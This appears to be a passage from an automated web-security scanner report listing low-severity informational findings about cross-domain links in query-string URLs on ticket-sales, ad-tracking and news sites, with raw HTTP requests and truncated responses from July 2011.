Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BH%2FkqNBjoLb2Zmc2V0af6QnQ%3D%3D--976c30f9ab045a1cfd33499b88aa515a33432d71; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11824
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
</title>
<link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" />

<!--[if lte IE 6]>
...[SNIP]...
<div class='broker-img'>
<img alt="Provider-large-549" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
</script>
<script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
<a class='fsAuthClose'>
<img alt="Cancel" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...

20.19. http://bing.fansnap.com/checkout/index/418563179  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 22
ETag: "a77815d5d483b7d39d35206e9af3772a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CWdhqOBjoLb2Zmc2V0af6QnQ%3D%3D--8f0f6d1603aea2d08c675430159ed90f71b0f19d; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11810
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
</title>
<link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" />

<!--[if lte IE 6]>
...[SNIP]...
<div class='broker-img'>
<img alt="Provider-large-511" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
</script>
<script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
<a class='fsAuthClose'>
<img alt="Cancel" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...

20.20. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/events/search?q=U2+with+Interpol+(rescheduled+from+7%2f19)&p1=[Events%20source=%22vertical%22+qzeventid=%22f389669%22]&FORM=DTPEVE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420
If-None-Match: "1237402bfa716d1b23edce2a34ba2262"

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:34:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 424
ETag: "13894ec26df92ffcfe8a7d45e8580ead"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311104083; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 19:34:43 GMT
Set-Cookie: _fancat_session=BAh7EjoPc2Vzc2lvbl9pZCIlMDE4M2Q1OWNmMDhkNzQ1OTM2YmM3MzY2ZWUzMzhhYjc6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGkEIRfNFToSYmdfdmlzaXRvcl9pZCIVMTM0MjU2NjgzMDI3NTU4NToRYmdfc3R5bGVfaWRzSSIABjsHRjoLYmdfbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUAROhBzcHZfc3JjXzcwMVQ6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1z2huA5nTDigY6C29mZnNldGn%2BkJ06EXNwdl9zcmNfMTk4N1Q%3D--599dd929144daee7633c9982b135b8d1876ed56b; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 23596
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
</title>
<link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" />

<!--[if lte IE 6]>
...[SNIP]...
<body class='seatscontroller landing_index '>
<iframe src="http://www.bing.com/s/ack.html" width="0" height="0" border="0" frameborder="0" style="display:none;" scrolling="no"></iframe>
...[SNIP]...
<br />
<img alt="Loading-32-onwhite" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
<div id='map-loading'>
<img alt="Loading-32-onwhite" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
</div>
<a href="http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&amp;majorcatid=10001&amp;minorcatid=1" id="primary-link" rel="nofollow" target="_blank">Check Official Box Office</a>
...[SNIP]...
</p>
<img alt="" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron2.gif?REL-fansnap-1.20.2-r31787" />
<img alt="" id="int-progress-img" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
<br />
<img alt="Loading-32-onwhite" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
<a class='closePingoutModal'>
<img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...
<a class='closeSurveyModal'>
<img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...
<a class='closeBrokerFilterModal'>
<img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...
<a class='closeArsecFilterModal'>
<img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...
<div class='bv-header-waiting'>
<img alt="Loading-32-onwhite" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787" />
<h3>
...[SNIP]...
<a class='closeBVModal'>
<img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...
<div class='photoHolder'>
<img alt="Photo" id="photoImage" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
<a class='photoClose'>
<img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...
</script>
<script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
<![if !IE]><script src="http://ecn.dev.virtualearth.net/mapcontrol/v6.3/js/atlascompat.js"></script><![endif]>
<script src='http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3' type='text/javascript'></script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
<script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...

20.21. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?pixid=99062281 HTTP/1.1
Host: bp.specificclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: ug=WPTUOuwXp9NyRD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Tue, 19 Jul 2011 20:49:00 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;c15=&amp;cv=2.0&amp;cj=1">here</a>
...[SNIP]...

20.22. http://cache.boston.com/universal/js/twitterwidget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.boston.com
Path:   /universal/js/twitterwidget.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /universal/js/twitterwidget.js?v2 HTTP/1.1
Host: cache.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=8; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:31:02 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Content-Type: application/javascript
Last-Modified: Wed, 22 Sep 2010 15:11:58 GMT
ETag: "3c5233-785c-490da91191fb8"
Accept-Ranges: bytes
Served-By: connor
Age: 765
Cache-Control: max-age=3591
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Tue, 19 Jul 2011 21:30:52 GMT
Via: 1.1 rhv082178010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 30812

function twitterCallback2(twitters) {
var statusHTML = [];
for (var i=0; i<twitters.length; i++){
var username = twitters[i].user.screen_name;
var status = twitters[i].text.replace(/((http
...[SNIP]...
</a>';
}).replace(/\B@([_a-z0-9]+)/ig, function(reply) {
return reply.charAt(0)+'<a href="http://www.twitter.com/'+reply.substring(1)+'">'+reply.substring(1)+'</a>
...[SNIP]...
</span> <a style="font-size:85%" href="http://twitter.com/'+username+'/statuses/'+twitters[i].id+'">'+relative_time(twitters[i].created_at)+'</a>
...[SNIP]...
</a>"+d})},at:function(c){return c.replace(/\B\@([a-zA-Z0-9_]{1,20})/g,function(d,e){return'@<a target="_blank" class="twtr-atreply" href="http://twitter.com/'+e+'">'+e+"</a>"})},list:function(c){return c.replace(/\B\@([a-zA-Z0-9_]{1,20}\/\w+)/g,function(d,e){return'@<a target="_blank" class="twtr-atreply" href="http://twitter.com/'+e+'">'+e+"</a>"})},hash:function(c){return c.replace(/\B\#(\w+)/gi,function(d,e){return'<a target="_blank" class="twtr-hashtag" href="http://twitter.com/search?q=%23'+e+'">#'+e+"</a>
...[SNIP]...
<div class="twtr-img"><a target="_blank" href="http://twitter.com/'+e.user+'"><img alt="'+e.user+' profile" src="'+e.avatar+'">
...[SNIP]...
<p> <a target="_blank" href="http://twitter.com/'+e.user+'" class="twtr-user">'+e.user+"</a>
...[SNIP]...
<i> <a target="_blank" class="twtr-timestamp" time="'+e.timestamp+'" href="http://twitter.com/'+e.user+"/status/"+e.id+'">'+e.created_at+'</a> <a target="_blank" class="twtr-reply" href="http://twitter.com/?status=@'+e.user+"%20&in_reply_to_status_id="+e.id+"&in_reply_to="+e.user+'">reply</a>
...[SNIP]...
<div><a target="_blank" href="http://twitter.com"><img alt="" src="http://widgets.twimg.com/j/1/twitter_logo_s.'+(a.ie?"gif":"png")+'"'+k()+'></a>
...[SNIP]...
<span><a target="_blank" class="twtr-join-conv" style="color:'+this.theme.shell.color+'" href="http://twitter.com/'+this._getWidgetPath()+'">'+this.footerText+"</a>
...[SNIP]...
.stop()}this.newResults=true;if(!this._profileImage&&this._isProfileWidget){var i=j[0].user.screen_name;this.setProfileImage(j[0].user.profile_image_url);this.setTitle(j[0].user.name);this.setCaption('<a target="_blank" href="http://twitter.com/'+i+'">'+i+"</a>
...[SNIP]...

20.23. http://cc.bingj.com/cache.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cc.bingj.com
Path:   /cache.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cache.aspx?q=xss.cx&d=4837056837976815&mkt=en-US&setlang=en-US&w=c0a8d758,848ac409 HTTP/1.1
Host: cc.bingj.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 15:15:54 GMT
Content-Length: 8574
Connection: close

<base href="http://xss.cx/"/><meta http-equiv="content-type" content="text/html; charset=utf-8"/><!-- Banner:Start --><style type="text/css">#b_cpb{color: black; font: normal normal normal small norma
...[SNIP]...
<strong><a href="http://xss.cx/" onmousedown="return si_T('&amp;ID=SERP,5003.1')">http://xss.cx/</a>
...[SNIP]...
visited it). This is the version of the page that was used for ranking your search results. The page may have changed since we last cached it. To see what might have changed (without the highlights), <a href="http://xss.cx/" onmousedown="return si_T('&amp;ID=SERP,5003.2')">go to the current page</a>
...[SNIP]...
<li class="rtsLI rtsLast"><a title="Blog" class="rtsLink" href="http://www.cloudscan.me/"><span class="rtsOut">
...[SNIP]...
</div><script type="text/javascript" src="http://www.google.com/jsapi">
</script>
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
<noscript><img src="http://rt.trafficfacts.com/ns.php?k=58g8b2fdf373edb2af9436c38b82143b37ea8da413dh26" height="1" width="1" alt=""/></noscript>
...[SNIP]...

20.24. http://clk.specificclick.net/click/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.specificclick.net
Path:   /click/v=5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /click/v=5;m=3;l=24555;c=159320;b=985192;ts=20110719164416;dct=http://t.atdmt.com HTTP/1.1
Host: clk.specificclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PVM/iview/340524297/direct/01?click=http://clk.specificclick.net/click/v=5;m=3;l=24555;c=159320;b=985192;ts=20110719164416;dct=
Cookie: ug=WPTUOuwXp9NyRD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Set-Cookie: ug=WPTUOuwXp9NyRD; Domain=.specificclick.net; Expires=Sun, 17-Jul-2016 20:44:45 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://t.atdmt.com
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 168
Date: Tue, 19 Jul 2011 20:44:45 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://t.atdmt.com">here</a>.<p>
</body>
</html>

20.25. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fsharethis.com%2Fprivacy&jsref=&rnd=1311085721255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
